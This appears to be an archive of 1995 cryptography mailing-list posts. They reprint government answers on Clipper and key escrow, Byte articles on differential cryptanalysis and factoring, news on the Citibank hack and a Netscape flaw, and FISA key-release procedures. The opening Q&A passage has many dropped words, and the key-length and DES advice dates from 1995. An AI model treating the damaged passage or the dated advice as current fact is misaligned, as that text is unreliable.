study.  We expect that it will give very careful consideration the issues, and we would not want the pressure of an short deadline to limit the study group's ability to produce best report possible.
2.   The Administration has said that it is continuing to export of the most sophisticated encryption devices, in part,
"because of the concerns of our allies who fear that strong
encryption technology would inhibit their law enforcement
capabilities."  Do we really need to help our allies by the export of strong American encryption products, since those countries can simply control the encryption bought within their
     Answer:  Exports of encryption products are subject to primarily to protect U.S. national interests, including security, law enforcement, foreign policy, and other important
interests.  The law enforcement concerns of our allies are a
consideration, especially as the ability of our allies to terrorism, drug trafficking, and other international law
enforcement problems can have direct benefits to the United However, foreign law enforcement concerns do not drive our control policy.  We would continue to review encryption exports protect U.S. national interests even if foreign law enforcement
concerns disappeared.
3.   Do you know whether foreign governments would be interested in
importing key escrow encryption products to which they hold the
decoding keys?
     Answer:  Several foreign governments have expressed in key escrow encryption technology due to their own law
enforcement concerns.  There have been some preliminary
discussions, but issues such as who would hold the escrowed and the circumstances of government access to escrowed keys must be
fully vetted.
4.   The Government wants the key escrow encryption standard to
become the de facto industry standard in the United States.  the Government abandon the Clipper Chip program if it is shown be unsuccessful beyond government use?
     Answer:  We do not expect the program to be unsuccessful
beyond government.  We have developed a sound security product we expect will find many uses in government information systems further believe that government use will bring with it a market, particularly in the defense sector.  We have developed sound security product that we expect will find many uses in
government information systems regardless of its success in
commercial markets.
5.   Openly available devices, such as Intel-compatible
microprocessors, have seen dramatic gains, but only because
everyone was free to try to build a better version.  Given the
restrictions on who can build devices with the classified algorithm, how will key escrow chips keep up with advances in
semiconductor speed, power, capacity and integration?
     Answer:  Despite the requirements that a firm must meet to
produce key escrow encryption chips, we expect that there will a number of manufacturers competing against each other to the best product, and that such competition will drive them to up with the latest technological advances.  It is worth noting only a few companies can produce the sophisticated you reference, yet the competition in that market has driven to achieve remarkable advances in that technology.  NSA's secure telephone program provides an example of a cryptographic
product line that keeps pace with technology.
The presence of a classified algorithm does not preclude
keeping pace with technology.  Through NSA's use of a multi-vendor approach, STU-III secure telephone products have
continued to evolve in response to user requirements and
technological advances despite their use of a classified algorithm and the consequent need for security restrictions on 6.   How well does the Skipjack algorithm work on
telecommunications operating at very high speeds.  Is NSA on another algorithm, called BATON, that could be used in high
speeds with a key escrow system?  Will Capstone be compatible      Answer:  Using currently available microelectronics the SKIPJACK algorithm could not be used for encryption at very
high speeds.  BATON is the name of an algorithm developed by that could be used at higher rates of speed.  We have no plans develop key escrow encryption devices using BATON, however.
Instead, we are considering another algorithm for use at high
speeds with a key escrow system.
A high-speed key escrow device based on an algorithm other
than SKIPJACK would not be "compatible with Capstone" in the that traffic encrypted by such a device could not be decrypted Capstone, and vice versa.  However, since such a device would used for much higher-speed applications than those for which
Capstone was designed, there would be no need for it to be
compatible with Capstone in that sense.
7.   Can Capstone be used to encrypt video programming?  If so,
have cable companies been approached by any government agency use Capstone to scramble or encrypt cable program?
     Answer:  Capstone could be used to encrypt any digital including video programming, operating at up to about 10 bits per second.  It could be used for encrypting individual channels but not for bulk encryption of many channels together in a single link.  NSA is not aware of any government
agency approaching cable companies to urge the use of Capstone.
Two manufacturers have asked us about the suitability of key devices for this purpose, however.
8.   Encryption software is available that can be used with to encypt a message before after it has been encrypted with
Clipper.  This "double encrypting" risks bypassing the key feature.  If a sender first encrypts the message with software
using DES, and then transmits the message "double encrypted" Clipper, can tell you from looking at the cipher, or encrypted
text, that the underlying message was encrypted?
     Answer:  The only way to tell that a message has been encrypted" in this way would be to decrypt the "outer layer" of
encryption, i.e. that done with Clipper.  Only then would one able to tell that the message had first been encrypted with
something else.

@_date: 1995-09-15 18:07:38
@_author: Anonymous 
@_subject: Picking the Crypto Locks 
Byte, October, 1995, pp. 77, 80.
Picking the Crypto Locks
A new technique called differential cryptanalysis can
break even DES quickly
By Peter Wayner
How secure is your encrypted data? Advances in
mathematics and increased computing power mean you need
longer keys and stronger algorithms if you still want to
keep your secrets. Both private-key encryption (which
uses a single key for coding and decoding) and public-key
systems (which use separate keys for encryption and
decryption) are increasingly vulnerable to determined
attack. But do these weaknesses represent a real threat
to encrypted data, or are they still just intriguing
research results?
Unfortunately, when we try to assess the effectiveness of
today's popular cryptographic systems, we run into a
problem of mathematical ignorance. Most people who are
familiar with mathematics can work in two directions,
forward and backward, like the simple algebraic equation
a = b + 1. We can determine the value of the first
variable from that of the second and vice versa. Crypto
systems, however, generally rely on mathematics that
works only in one direction. People assume these systems
are secure because no one has yet shown how to work the
mathematics backward and break open the message. In
general, we determine the strength of most cryptographic
systems by seeing how well they avoid the attacks we know
have been used on other systems. If none of the past
attacks seems to work, then we deem a system secure. For
Let's look at how today's codebreakers work, the
resources and time they need, and what we require in the
way of new systems and longer keys. Recent assessments of
the strength of private-key crypto systems involve
looking for theoretical holes and measuring the time
needed for a brute-force attack. Finding the holes can be
devilishly hard, calling for deep mathematical insights.
Brute-force attacks are easier to mount if enough
computational hardware is available, but they're also
easy to defend against.
The most important development in the realm of data
encryption in recent years is Eli Biham and Adi Shamir's
differential cryptanalysis. They showed how to mount a
limited attack on today's most widely used cryptosystem,
DES (the federal Data Encryption Standard), which is also
the basis for Unix's password system.
Imagine that you had access to your victim's DES cipher
"box" (the common term for an enciphering system) with
preloaded keys. Your goal is to determine the 56-bit key,
so that you can decrypt the other messages your victim
had encrypted with the box. Biham and Shamir showed that
you could infer the hidden key if you could pass 247
messages through the box and observe what came out. This
chosen plaintext attack builds up a statistical model of
the cipher, and it needs this many plaintexts to produce
an answer with confidence.
Most intriguing, this work exposed flaws in many DES
substitutes. Because the U.S. government classified the
details behind DES's design, many assumed that there
might be a trapdoor through which the government could
eavesdrop. To circumvent these potential trapdoors, some
folks designed their own variations of DES. Most of these
new ciphers, however, fall even faster to Biham and
Shamir's mathematical machinery. FEAL-4, a faster
replacement, for example, takes only four well-chosen
Strengths and Weakness of Crypto Algorithms
Algorithm      Comment      Strengths     Weaknesses
DES            Standard,    Long-tested   Has yielded
               Widely                     to DC
               Accepted
FEAL-4         DES                        Easily broken
               substitute                 by DC
GDES,          DES-like                   Easily broken
New DES                                   by DC
Khufu          DES-like     Secure        New, unknown
                                          against DC
Blowfish       DES-like     Secure        New, unknown
                                          against DC
RC-4           Proprietary  Variable-     Unknown
                            length key
RSA            Widely used  Long-tested   Vulnerable to
Public Key                                advances in
                                          factoring  Skipjack       Classified   Considered    Algorithm must
                            strong        remain secret
                                          to preserve
                                          law-enforcement
                                          trapdoor
DC = differential cryptanalysis
Recently, the IBM scientists who originally designed DES
revealed that they anticipated Biham and Shamir's attack
and optimized DES to resist it. Because other
nongovernment cryptographers didn't know about this
attack, they couldn't design their software to resist it.
Now the information is public, and there are new ciphers
that hold up well against these attacks. Ralph Merkle's
Khufu and Bruce Schneier's Blowfish are two private-key
ciphers that are similar to DES but resist differential
cryptography. They do this by creating new S-boxes for
each encryption, using the key to randomize them.
(S-boxes are the essential scrambling elements of
DES-like ciphers. Think of them as lookup tables or
nonlinear functions; their outputs should be as random as
possible.) Differential cryptanalysis works only if the
attacker knows what's in the S-boxes.
This work also revealed some stunning counterintuitive
results. Key length is usually taken as a rough measure
of a system's security. DES uses 56-bit keys; a
brute-force attacker might need to try all 2^56 keys to
find the right one. A longer key would mean a longer
brute-force attack. However, Biham and Shamir showed that
even if DES used longer keys, it would hardly be any
stronger against differential cryptanalysis. The
statistical model would still be solvable if DES used the
maximum of 768 bits.
Applying this knowledge to other types of ciphers is
tricky. RSA Data Security markets a proprietary algorithm
called RC-4 that accepts a variable-length key; this
algorithm is used in many products. The flexible key
length can be an advantage in some situations. For
example, the government allows general export of software
using RC-4 with a 40-bit key, but similar software using
a longer key must stay within the U.S. While we don't
know if differential cryptanalysis can be applied to RC-4
directly, because of the algorithm's proprietary nature,
the results with DES suggest that more key is not
necessarily stronger.
Men and Machines
Mathematical tools like differential cryptanalysis can be
the most powerful attack against a cipher system.
Brute-force attacks are normally a last resort, rare in
practice because cipher designers routinely use long key
lengths specifically to preclude them. But times are
changing. We're reaching a point at which a large machine
can quickly search the entire keyspace of DES. DES is
still in wide use; it' s been the commercial and
governmental standard for nearly two decades. Replacing
such standards can be a painfully slow process.
DES users should be thinking about what can be done with
off-the-shelf hardware.
Brute-force attacks simply use large machines that try
all possible passwords in parallel. It's even possible to
produce native chips that run DES. Michael Wiener of Bell
Northern Research described how to build a $1 million
machine using a pipelined DES processor that could cruise
through all possible keys in about 7 hours.
Massively parallel machines can also attack the problem.
Some of the most promismg emergmg machines distribute
small, 1-bit processors directly onto the memory chips.
Some have 1024 processors on a chip with 42 bits of
memory per processor. (Before it entered Chapter 11, Cray
Computer was building for the National Security Agency a
special Cray 3 with such processor-embedded memory.) In
1992 I designed a machine using 1 million associative
processor memory chips (standard DRAM densihes) from
Coherent Research (Syracuse, NY) that could attack all of
DES in one day. This machine could be reprogrammed to
attack other DES-like ciphers. Linden Technology (Austin,
TX) is currently exploring manufacturing new 4-Mb DRAMs
with the 1024 associative processors built onto the chip.
The effect of brute-force attacks on DES is also
important for Unix security, which stores each password
after passing it through DES 25 times. At log-in, you
type your password; it's encrypted 25 times and the
result compared against the password file. If it matches,
the system grants you access. Because the password file
doesn't contain the passwords themselves, unauthorized
users can't use the file to recover them directly. They
must use a brute-force machine. However, the brute-force
attack can be relatively successful against Unix, because
the keyspace is smaller. Most users limit their passwords
to alphabetic characters, occasionally adding numbers.
This makes searching for passwords much faster; it could
be done quite quickly with an associative-memory parallel
processor. One estimate suggests that a computer using
512 of Linden's chips could test all six-character
alphanumeric passwords in 15 minutes. Clearly. the Unix
password structure needs to be rethought in light of
today's machines and code-breaking techniques.
Because of this new vulnerability, you may want to
explore other, newer ciphers. such as Merkle's Khufu or
Schneier's Blowfish. The classified Skipjack algorithm
buried inside the U.S. government's Clipper and Capstone
encryption chips also uses S-boxes, but little is known
about their design. There's little reliable public
information about RSA Data Security's RC-4. Anyone who
uses these algorithms must be prepared to trust the wits
of the designers, because the algorithms have not
undergone the intensely thorough and long-time public
scrutiny given to DES.
Many organizations have opted to continue with DES, but
the current state of the art is triple-DES -- three
passes of the algorithm with either 112- or 168-bit keys.
This effectively guards against both brute-force and
differential analysis attacks. These users can rest
assured that, paradoxically, all the attacks focused on
DES continues to keep it strong.
Peter Wayner is a BYTE consulting editor living in
Baltimore, MD. You can reach him on the Internet at
pcw at access.digex.net, on BIX as pwayner at bix.com, or on
the World Wide Web at Byte, October, 1995, p. 78.
Factoring in Public-Key's Future
Long thought nearly unbreakable, public-key cryptogratphy
is yielding to attack. The secret of security here is key
By Bruce Schneier
Factoring large numbers is hard but not as hard as it
used to be. This has grave implications for the
effectiveness of public key cryptocraphy, which relies on
the difficulty of factoring long keys for its security.
But how long is long enough'?
 "I shall be surprised if
anyone regularly factors numbers of size 10^80 without
special form during the present century." In 1977, Ron
Rivest said that factoring a 125-digit number would take
40 quadrillion years. In 1994, a 129-digit number was
factored. The lesson here is that making predictions is
Today, 512-bit keys are common. Factoring them, thus
destroying their security, is well within the range of
possibility for today's computing resources. A weekend-
long worm on the Internet could do it.
Computing power is measured in MIPS-years: a
million-instructions-per-second computer running for one
year, or about 3 x 10^13 instructions. A 100-MHz Pentium
is about a 50-MIPS machine; a 1600-node Intel Paragon is
about 50,000 MIPS.
In 1983, a Cray X-MP supercomputer factored a 71-digit
number in 0.1 MIPS-years, using 9.5 CPU hours. That's
expensive. Factoring the 129-digit number in 1994
required 5000 MlPS-years and used the idle time on 1600
computers around the world over an eight-month period.
Although it took longer, it was essentially free.
Those two computations used what's called the *quadratic
sieve*, but a newer, more powerful algorithm has arrived.
The *general number filed sieve* is faster than the
quadratic sieve for numbers well below 116 digits and can
factor a 512-bit number over 10 times faster -- it would
take less than a year to run on  an 1800-node Intel
And the process gets still faster. Mathematicians keep
coming up with new tricks, new optimizations, and new
techniques. A related algorithm, the special number field
sieve, can already factor numbers of a specialized form
(not generally used for cryptography) much faster. So we
can probably optimize the general number field sieve to
run that fast. For all we know, the National Security
Agency is already doing it.
The figure "MIPS Years Needed to Factor" gives the number
of MlPS-years required to factor "special" and "general"
numbers of different lengths.
How Big Is Big Enough?
The wise cryptographer is ultraconservative when choosing
key lengths for a public-key system. You must consider
the intended security, the key's expected lifetime, and
the current state of the factoring art. Now you need a
1024-bit number to get the same security you got from a
512-bit number in the early 1980s. If you want your keys
to remain secure for 20 years, 1024 bits is probably too
Consider these assumptions from the mathematicians who
factored RSA-129: We believe we could acquire 100,000
machines without superhuman or unethical efforts and
without an Internet womm or virus. Many organizations
have several thousand machines on the Net. Using their
facilities would require diplomacy but should not be
impossible. Assuming an average power of 5 MIPS and one
year elapsed time, we could reasonably embark on a
project that would require half a million MIPS-years. The
project to factor the 129-digit number harnessed an
estimated 0.03 percent of the Internet's total computing
power. A well-publicized project might be able to harness
2 percent of the world's computing power for a year.
My recommendations for public-key lengths are given in
the figure "Recommended Public-Key Key Lengths" according
to how long you require the key to be secure. There are
three key lengths given for each period -- one secure
against an individual cryptanalyst who can get his hands
on 10,000 MlPS-years, one against a major corporation
that could harness 10^7 MIPS-years, and the third secure
against a major govemment and 10^9 MIPS-years. These
figures assume that computing power will increase by a
factor of 10 every five years and that mathematical
advances will let us factor numbers at the speeds of the
special number field sieve.
Not everyone will agree with these final recommendations.
The National Institute of Standards and Technology has
mandated 512- to 1024-bit keys for its Digital Signature
Standard. PGP has a maximum RSA key length of 1280 bits.
Aljen Lenstra, the world's most successful factorer,
refuses to predict beyond 10 years. There's always the
possibility that an advance in factoring will surprise me
as well, though I tried to factor everything into my
calculations. But why trust me? I just proved my own
foolishness by making predictions.
MIPS Years Needed to Factor
Ascending Line of General Number Field Sieve
Ascending Line Special Number Field Sieve
Y-axis: MIPS-years
10^0, 10^3, 10^6, 10^9, 10^12, 10^15, 10^18, 10^21
X-axis: Bits
512, 768, 1024, 1280, 1536, 2048
Recommended Public-Key Key Lengths
Ascending bars for: Individual, Company, Government
Y-axis: Bits 0, 500, 1000, 1500, 2000, 2500
X-axis: Year 1995  2000  2005  2010  2015
Bruce Schneier is the author of Applied Cryptography
(John Wiley), the second edition of which is due out in
December. He can be reached on the Internet as
schneier at winternet.com, or on BIX c/o editors at bix.com.

@_date: 1995-09-20 07:25:24
@_author: Anonymous 
@_subject: Banks and Netscape InSec 
Financial Times, September 20, 1995, p. 12.
Banks' Security Chains Failed
The Citibank case has highlighted weaknesses in corporate
security measures.
By John Mason
Could it happen to us? Banks have been soul-searching about
their security systems in response to the alleged computer
hacking fraud on Citibank, in which $10m (6.49m pounds) is
said to have been removed from client accounts by a young
Russian based in St Petersburg.
In public, banks express confidence in their computer
security. "It's a shame what happened at Citibank, but it
couldn't happen here," is a typical response.
However, some industry insiders are concerned that many banks
and other commercial organisations are still leaving
themselves dangerously open to attack by hackers. Rumours of
some banks not admitting to similar breaches only increase
The full technical picture of what allegedly happened at
Citibank is unclear. The largest US bank, unsurprisingly, is
reluctant to reveal precisely how Mr Vladimir Levin --
apparently without inside help -- allegedly breached its Wall
Street security system from his personal computer in St
Petersburg. A UK court will today decide whether to extradite
Mr Levin to the US to face trial.
It seems that Citibank was caught out by its technology, which
could not match recent developments available to hackers.
Citibank's main weakness is known to have been its use of
"fixed passwords" to guard its computerised cash management
system. This system, dubbed Citicorp Cash Manager, handles
transactions totalling $5OObn every day.
Cash management systems which provide customers with access to
their accounts so that they can make transfers, are inherently
vulnerable to hackers because by definition they allow
third-party access.
In the case of Citibank, access to the cash management system
could be made via telephone lines from anywhere in the world
using a computer. Until the incident, Citibank's system used
fixed or permanent passwords where the customer has only to
enter a name and regular password to gain entry to the system.
However, security experts now agree that this technology has
been rendered ineffective at guarding high-risk systems by the
proliferation of modem communications devices attached to
powerful PCs providing access to the Internet. Hackers now
have ready access to sophisticated software including
"sniffers" -- programs used by network managers which allow
them to look at and capture information on networks. These
give hackers access to huge quantities of information --
including directories of passwords.
The hackers can then take their pick of which password to use.
With bank cash management systems, this virtually amounts to
giving a hacker the choice of which client account to loot.
There are a number of steps banks and other security-conscious
computer network operators can take to defend themselves
against unauthorised intruders. The main option -- and that
introduced by Citibank since the Levin incident -- involves
the use of encrypted passwords that can be used only once.
A "smart card" issued to each customer contains a sequence of
passwords so that a different one is used each time. This
password is then encrypted or scrambled into a form that is,
its manufacturers claim unreadable to anyone "surfing" the
Internet. The main computer then deciphers the signal and,
able to recognise the sequence of changing passwords, lets the
genuine user into the system.
The chances of someone guessing one of Citibanks's passwords
are now one in 11m, says Mr Tom Brady of Enigma Logic of
Concord, California, which supplies this technology to
Citibank. The bank's previous fixed password technology, by
contrast, meant breaking the password system was relatively
straightforward, he says.
Concern centres on how quickly banks and others have reacted
to technological change. Although encryption technology has
been available for more than 10 years, it is only now being
generally introduced, and usually only for systems with
external access.
Barclays Bank introduced encryption for computer systems with
external access before the Citibank incident occured. Barclays
now feels "fairly comfortable" about the state of its
security, says Mr Philip Severs, deputy director of
operational risk.
However, it is clear that not every bank has closed the door
yet. Mr Severs says the business world is just "on the cusp"
of introducing encryption technology.
Another security adviser says the measures of one leading US
bank, based on both fixed and encrypted passwords, are still
considered weak by experts. Another security specialist
employed by a leading international bank says that senior
management throughout the industry has sometimes been slow to
react to change. "Sometimes people think that their security
is adequate simply because it has not been breached in the
past. At other times, head offices are warned of the dangers,
but fail to act because of cost factors."
Whatever the state of bank security, their experts agree that
their customers' awareness of the problem is lower. "Whenever
payments are made or orders placed electronically, then a
threat exists. The banks are leading on this. Companies are
some way behind," says Mr Severs.
But encryption remains only one way of improving security. The
alleged hacking incident at Citibank involved more than simply
breaching the bank's password system.
The US government claims Mr Levin was able to watch corporate
clients making numerous transactions before deciding which
account to take money from. He also allegedly spotted one
security precaution in place and limited each of his
withdrawals to under 200,000 pounds ($310,540).
Citibank will not comment on its security measures other than
to point to its "smart cards". Huwever, the bank agrees that
there was only partiai use of another well-established.
security system -- "predefined" transfer routes. These allow
customers to make transfers only to specific bank accounts
making it impossible for a hacker to remove funds for himself.
Citibank offers such an option. However, it is only useful to
some customers. The average corporate customer might find it
suitable because the number of destination accounts they need
is limited. However, for financial institutions making
transfers to many accounts, such a system is too cumbersome.
Perhaps significantly, one of Mr Levin's alleged nctims was an
investment company.
Citibank investigators say Mr Levin gave himself away by
making a number of "amateurish" mistakes, but admit he was a
very sophisticated computer operator, allegedly attempting a
particularly elegant fraud.
The bank concedes that it still does not fully understand all
the technical aspects of how Mr Levin allegedly managed to
break in. If and when he is extradited to the US and
introduced to that country's plea bargaining system, he will
be invited to explain further.
Banking security experts agree that the Citibank episode shows
that effective detection systems to track unusual transactions
remain essential. In the Citibank case these worked well,
enabling the attempted fraud to be nipped in the bud,
monitored and losses kept to $400,000.
But they agree that even if new technology is introduced,
keeping one step ahead of the hackers all the time is just not
possible. One with knowledge of the Citibank case comments:
"At the end of the day it cannot be done. Essentially,
security is about being reactive, not pro-dctive."
Meanwhile, the Citibank episode provides the most public
example yet of how hackers can threaten the integrity of the
international banking system. And just as the Barings collapse
prompted other banks to review their internal management
controls, so Mr Levin's case is having a similar effect on
computer security.
But as one bank security expert says: "It takes an incident
like this to prompt people to review their systems. Whether
they take action however is a different matter."
Financial Times, September 20, 1995, p. 20.
Netscape flaw may deal blow to Internet security
By Louise Kehoe in San Francisco
A security flaw in Netscape Communications' popular Internet
software could deal a serious blow to companies planning to
transact business on the Internet, the global computer
The flaw, discovered by two computer science students at the
University of California at Berkeley, means that financially
sensitive data, such as credit card numbers, sent over the
Internet using Netscape software could be vulnerable to
computer hackers.
"Security is the number one issue" that needs to be resolved
if the Internet is to become a medium for largescale
electronic commerce, according to Ms Cathy Medich, executive
director of CommerceNet, a consortium of companies that is
developing standards and protocols for conducting business on
the Internet with backing from the US government.
The security breach is a setback for Netscape, raising
concerns about the company's ability to produce reliable
secure software.
Netscape's so-called secure browsers are used by an estimated
66 per cent of people accessing the World Wide Web, the
segment of the Internet where thousands of companies have set
up electronic displays of their products.
The software had been seen as a breakthrough for electronic
commerce, enabling people to buy and sell goods online without
fear of their messages being intercepted.
Netscape confirmed that a security loophole has been
identified, but said it would offer a free security "patch" by
the end of this week on its World Wide Web page
No losses have been reported as a result of the security
breach, Netscape said.
This is the second time that Netscape's encryption has been
"cracked". Last month, a computer expert in France was able to
decode the weaker version of Netscape's cyphers, which the
company is allowed to export.
The security flaw found by the Berkeley students affects all
current versions of Netscape soMware, including its browsers
and server software, the company said.
However, next week the company will begin trials of a new
version of its browser, which will contain the security patch.

@_date: 1995-09-22 05:30:42
@_author: Anonymous 
@_subject: Project: a standard cell random number generator 
These supplement JG's post on CAPSTONE -- which is itself
available with related crypto papers at csrc.ncsl.gov:
URL:                    February 4, 1994
               AUTHORIZATION PROCEDURES
       FOR RELEASE OF ENCRYPTION KEY COMPONENTS
    IN CONJUNCTION WITH INTERCEPTS PURSUANT TO FISA
The following are the procedures for the release of
escrowed key components in conjunction with lawfully
authorized interception of communications encrypted with
a key-escrow encryption method. These procedures cover
all electronic surveillance conducted pursuant to the
Foreign Intelligence Surveillance Act (FISA), Pub. L.
95-511, which appears at Title 50, U.S. Code, Section
1801 et seq.
1)  In each case there shall be a legal authorization
    for the interception of wire and/or electronic
    communications.
2)  In the event that federal authorities discover
    during the course of any lawfully authorized
    interception that communications encrypted with a
    key-escrow encryption method are being utilized,
    they may obtain a certification from an agency
    authorized to participate in the conduct of the
    interception, or from the Attorney General of the
    United States or designee thereof.  Such
    certification shall
    (a) identify the agency participating in the conduct
        of the interception and the person providing the
        certification;
    (b) certify that necessary legal authorization has
        been obtained to conduct electronic surveillance
        regarding these communications;
    (c) specify the termination date of the period for
        which interception has been authorized;
    (d) identify by docket number or other suitable
        method of specification the source of the
        authorization;
    (e) certify that communications covered by that
        authorization are being encrypted with a
        key-escrow encryption method;
    (f) specify the identifier (ID) number of the
        key-escrow encryption chip providing such
        encryption; and
    (g) specify the serial (ID) number of the key-escrow
        decryption device that will be used by the
        agency participating in the conduct of the
        interception for decryption of the intercepted
        communications.
4)  This certification shall be submitted to each of the
    designated key component escrow agents.  If the
    certification has been provided by an agency
    authorized to participate in the conduct of the
    interception, a copy shall be provided to the
    Department of Justice, Office of Intelligence Policy
    and Review.  As soon as possible, an attorney
    associated with that office shall provide each of
    the key component escrow agents with written
    confirmation of the certification.
5)  Upon receiving the certification, each key component
    escrow agent shall release the necessary key
    component to the agency participating in the conduct
    of the interception.  The key components shall be
    provided in a manner that assures they cannot be
    used other than in conjunction with the lawfully
    authorized electronic surveillance for which they
    were requested.
6)  Each of the key component escrow agents shall retain
    a copy of the certification, as well as the
    subsequent written confirmation of the Department of
    Justice, Office of Intelligence Policy and Review.
7)  Upon, or prior to, completion of the electronic
    surveillance phase of the investigation, the ability
    of the agency participating in the conduct of the
    interception to decrypt intercepted communications
    shall terminate, and such agency may not retain the
    key components.
8)  The Department of Justice shall, in each such case,
    (a) ascertain the existence of authorizations for
        electronic surveillance in cases for which
        escrowed key components have been released;
    (b) ascertain that key components for a particular
        key-escrow encryption chip are being used only
        by an agency authorized to participate in the
        conduct of the interception of communications
        encrypted with that chip; and
    (c) ascertain that, no later than the completion of
        the electronic surveillance phase of the
        investigation, the ability of the agency
        participating in the conduct of the interception
        to decrypt intercepted communications is
        terminated.
9) Reports to the House Permanent Select Committee on
    Intelligence and the Senate Select Committee on        Intelligence, pursuant to Section 108 of FISA,
    shall, with respect to any order for authorized
    electronic surveillance for which escrowed
    encryption components were released and used for
    decryption, specifically note that fact.
These procedures do not create, and are not intended to
create, any substantive rights for individuals
intercepted through electronic surveillance, and
noncompliance with these procedures shall not provide the
basis for any motion to suppress or other objection to
the introduction of electronic surveillance evidence
lawfully acquired.

@_date: 1995-09-23 05:40:19
@_author: Anonymous 
@_subject: 500m.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo. 
NYT Magazine, Sept 24, 1995
How the Propeller Heads Stole the Electronic Future
The silver-haired media monopolists follow their 500-
channel dream. They haven't reckoned with the 500 million
channels of Netscape and the Internet.
By Steven Levy.
If you want an arbitrary date for the burial of the
500-channel dream, Aug. 9, 1995, will do just fine. On
that morning, the public had its first crack at buying
stock in the year-old Netscape Commumcations Corporation,
which makes software that helps people navigate the
Internet and set up "sites" that Net surfers can visit.
What happened next is already the stuff of high-tech
legend. The offering price of $28 per share shot up
within minutes to a vertiginous $75 until finally
settling at $58, a price that valued the
as-yet-profitless company at well over $2 billion. A
month later, it was trading at about $53.
The initial news reports focused on the instant
millionaires at Netscape, including a 24-year-old
computer programmer, Marc Andreessen, who emerged from
the stock offering with that all-important first $58
million. But the real significance of the event was not
that another bunch of propeller heads had joined the
ranks of the super-rich. Aug. 9 marked the moment when
Wall Street finally realized what had been becoming
increasingly apparent to computer users: a set of highly
technical but reliably standardized communications
protocols known as the Internet had established itself as
the real key to the electronic future. That future would
be made not by silver-haired telephone- and cable-company
executives in Denver, New York and Washington, building
an empire around a golden goose called pay-per-view
television, but by companies like Netscape and their
In short, the end of the 500-channel dream. This was a
myth constructed by the masters of the media, people like
John Malone of Tele-Communications Inc. (T.C.I.), Ray
Smith of Bell Atlantic and Sumner Redstone of Viacom.
They believed that the television set would extend its
domain from the center of the entertainment universe to
the worlds of commerce and information. Despite their
promises that the new era of digital media would be
marked by increased competition, they assumed that their
companies would keep their hands on the valves of a
limited information pipeline. But for consumers, the
dream offered only two differences, really, between what
the public has now and what will be available in the
*The same programming but more of it*. Instead of getting
50 or 60 alternatives when you plopped down in front of
the tube, you'd get a lot more. Five hundred was the
number that stuck in people's minds.
*So-called interactive programming*. The interactivity
comes in makng choices: pressing buttons to choose
programs and, above all, to buy things. The living-room
television would be a cash register of sorts, enabling
Dad, Mom, Junior, Sis and probably even the faithful dog
Astro to buy more programming -- and buy more everything,
from pizzas to Dustbusters.
The operators of those systems, like T.C.I. and Time
Warner, would act as gatekeepers, deciding which
entertainment channels, pay-per-view events, banks,
retailers, publications and data bases would reach
consumers. There were tremendous opportunities to make
money, not only from monthly fees and pay-per-view
charges but also from percentages of every transaction.
And then there was the wealth of information about
consumer buying habits generated by the aggregation of
buying choices made by pressing those buttons. This, too,
would be sold and bartered.
For the past few months the silver-haired guys have been
arranging expensive technology tests in places like
Orlando, Fla. They have been wooing Congress for
favorable regulations. They have been frantically merging
and making alliances. But meanwhile, a different vision
of the media future has begun to form -- totally under
their radar. It moved from the academic and scientific
communities, then to the business world, then to
politics. As it grew and grew, it suddenly became clear
that this new vision had the potential to pull the plug
on the 500-channel dream.
This is the Internet and its most interesting subset, the
World Wide Web. It is based on unlimited channels of
communication, community building, electronic commerce
and a full-blown version of interactivity that blurs the
line between provider and consumer. You don't need an
Arthur Andersen report or even a cyberpunk science
fiction novel to envision how this new model of the
future will work. Millions are already participating in
it. Its nascent form -- albeit with often sluggish
performance and frequent system crashes -- has spread
like digital wildfire.
In short, the information superhighway, font of a
thousand bad metaphors, is already here. But it's not
about sitting on a couch and pressing a button to order
"Dumb and Dumber." It's about Web surfing, open systems
and freedom.
Why did the stock market go bonkers for Netscape, a
year-old company that not only operated deep in the red
but also warned in its prospectus that it did not intend
to make any profits "in the foreseeable future?" Only one
reason: the Internet
If the 500 channel dream on the TV screen is the old
future, the new one is the Internet on the computer
screen. Think of it as a combination book, radio,
magazine, mailbox, conversation parlor, bulletin board,
billboard and, one day, television set. Install what is
known as a browser program -- the most popular is
Netscape's Navigator -- and you're cruising the World
Wide Web. Your screen is a selection of signed baseballs
up for auction, a tour of the Louvre, a zine (a
self-published magazine) on the life of a teen-age girl
in Canada, a multimedia repository of General Electric's
public relations documents, the complete text of the
Congressional Record. Millions of possibilities await
you, and getting to them is easy. Anything can be wired
to anything else on this World Wide Web (thus the name)
by moving the cursor to a highlighted word or image with
an embedded link to another location.
Web travelers do not just travel by links, of course --
they can go directly to any Web site. The interesting
thing about the sites is their equality. Like phone
numbers, or addresses on letters, these addresses have no
favored positions; in terms of gaining access to homes,
ABC, Disney and Sears have no inherent advantage over
Joe's Video or the corner pizza parlor. (For help in
knowing what's available, people are already adopting the
first of a new breed of electronic guide services, like
the popular Yahoo Web site, a sort of Baedeker's of the
At first, Web traveling seems like a fascinating but
perhaps frivolous diversion. But then you consider the
next step -- commerce. Secure creditcard transactions are
already possible, the ability to charge for time spent on
a link is currently being implemented and companies like
Visa, Mastercard and newer entities with names like
Cybercash and Digicash (and, yes, Microsoft) are
concocting Net-based technologies that work just like
cash. And then you begin to realize why some farsighted
people in the media industries are terrified of the World
Wide Web. Every home is potentially a video conferencing
center, every independent film maker is potentially a
widespread broadcaster, every business is potentially a
global marketer. A single twisted idea and a rudimentary
sense of layout can transform a voiceless outcast into a
cult publisher. Now that's interactivity.
The 500-cable-channel tests are just the beginning of a
long process. The Net, meanwhile, has millions of people
on it, now. It will take a decade or so to upgrade the
Net to carry high-quality video services, but most
everything else is feasible now and better suited to the
desktop than to the TV room. You can't easily read a
newsletter or a bank balance on a television set that's
20 feet away. So by the time the cable and telephone
companies get their systems in order, millions of
Americans will be riding the I-way from their dens and
offices, not their living rooms. Sure, eventually the
electronics of computers and televisions will be
indistinguishable, but by then the road to information
nilvana will have been laid -- and the ethos will be that
of the Internet.
In that ethos, the people who provide you the pipes to
move information have no say in what content moves
through those pipes. They collect no information on their
consumers' buying habits, and they certainly do not get
a piece of the transactions that occur over their wires.
The guys in the middle -- those with the 500-channel
dream -- will thus be cut out of the best part of the
The masters of the media have taken notice, and lately
they've been hedging their bets. Still, they have yet to
grasp that the Internet can never be merely another
profit center in their dreams of empire. Their power is
based on monopoly, on controlling distribution. But the
Net is built to smash monopolies. Instead of a
gatekeeper, users get an open invitation to the
electronic world and can choose whatever they want. "If
there is a market for 500 channels," says James
Barksdale, Netscape's president, "imagine the market for
5 million, 50 million, 500 million!"
